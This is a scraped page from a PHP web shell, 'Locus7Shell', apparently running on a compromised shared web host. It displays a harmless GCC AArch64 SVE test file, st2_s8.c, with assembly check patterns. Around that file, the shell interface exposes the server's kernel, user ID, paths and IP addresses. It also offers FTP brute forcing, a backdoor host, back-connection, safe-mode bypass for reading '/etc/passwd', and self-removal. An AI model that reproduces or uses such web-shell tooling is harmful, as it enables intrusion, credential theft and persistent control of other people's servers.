Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     st2_s8.c (4.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** st2_s8_base:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_s8_base, svint8x2_t, int8_t,
        svst2_s8 (p0, x0, z0),
        svst2 (p0, x0, z0))

/*
** st2_s8_index:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, x1\]
**    ret
*/
TEST_STORE (st2_s8_index, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 + x1, z0),
        svst2 (p0, x0 + x1, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_s8_1:
**    incb    x0
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_s8_1, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 + svcntb (), z0),
        svst2 (p0, x0 + svcntb (), z0))

/*
** st2_s8_2:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #2, mul vl\]
**    ret
*/
TEST_STORE (st2_s8_2, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 + svcntb () * 2, z0),
        svst2 (p0, x0 + svcntb () * 2, z0))

/*
** st2_s8_14:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #14, mul vl\]
**    ret
*/
TEST_STORE (st2_s8_14, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 + svcntb () * 14, z0),
        svst2 (p0, x0 + svcntb () * 14, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_s8_16:
**    incb    x0, all, mul #16
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_s8_16, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 + svcntb () * 16, z0),
        svst2 (p0, x0 + svcntb () * 16, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_s8_m1:
**    decb    x0
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_s8_m1, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 - svcntb (), z0),
        svst2 (p0, x0 - svcntb (), z0))

/*
** st2_s8_m2:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #-2, mul vl\]
**    ret
*/
TEST_STORE (st2_s8_m2, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 - svcntb () * 2, z0),
        svst2 (p0, x0 - svcntb () * 2, z0))

/*
** st2_s8_m16:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #-16, mul vl\]
**    ret
*/
TEST_STORE (st2_s8_m16, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 - svcntb () * 16, z0),
        svst2 (p0, x0 - svcntb () * 16, z0))

/*
** st2_s8_m18:
**    addvl    (x[0-9]+), x0, #-18
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[\1\]
**    ret
*/
TEST_STORE (st2_s8_m18, svint8x2_t, int8_t,
        svst2_s8 (p0, x0 - svcntb () * 18, z0),
        svst2 (p0, x0 - svcntb () * 18, z0))

/*
** st2_vnum_s8_0:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_vnum_s8_0, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, 0, z0),
        svst2_vnum (p0, x0, 0, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_vnum_s8_1:
**    incb    x0
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_vnum_s8_1, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, 1, z0),
        svst2_vnum (p0, x0, 1, z0))

/*
** st2_vnum_s8_2:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #2, mul vl\]
**    ret
*/
TEST_STORE (st2_vnum_s8_2, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, 2, z0),
        svst2_vnum (p0, x0, 2, z0))

/*
** st2_vnum_s8_14:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #14, mul vl\]
**    ret
*/
TEST_STORE (st2_vnum_s8_14, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, 14, z0),
        svst2_vnum (p0, x0, 14, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_vnum_s8_16:
**    incb    x0, all, mul #16
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_vnum_s8_16, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, 16, z0),
        svst2_vnum (p0, x0, 16, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st2_vnum_s8_m1:
**    decb    x0
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0\]
**    ret
*/
TEST_STORE (st2_vnum_s8_m1, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, -1, z0),
        svst2_vnum (p0, x0, -1, z0))

/*
** st2_vnum_s8_m2:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #-2, mul vl\]
**    ret
*/
TEST_STORE (st2_vnum_s8_m2, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, -2, z0),
        svst2_vnum (p0, x0, -2, z0))

/*
** st2_vnum_s8_m16:
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, #-16, mul vl\]
**    ret
*/
TEST_STORE (st2_vnum_s8_m16, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, -16, z0),
        svst2_vnum (p0, x0, -16, z0))

/*
** st2_vnum_s8_m18:
**    addvl    (x[0-9]+), x0, #-18
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[\1\]
**    ret
*/
TEST_STORE (st2_vnum_s8_m18, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, -18, z0),
        svst2_vnum (p0, x0, -18, z0))

/*
** st2_vnum_s8_x1:
**    cntb    (x[0-9]+)
** (
**    madd    (x[0-9]+), (?:x1, \1|\1, x1), x0
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[\2\]
** |
**    mul    (x[0-9]+), (?:x1, \1|\1, x1)
**    st2b    {z0\.b(?: - |, )z1\.b}, p0, \[x0, \3\]
** )
**    ret
*/
TEST_STORE (st2_vnum_s8_x1, svint8x2_t, int8_t,
        svst2_vnum_s8 (p0, x0, x1, z0),
        svst2_vnum (p0, x0, x1, z0))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--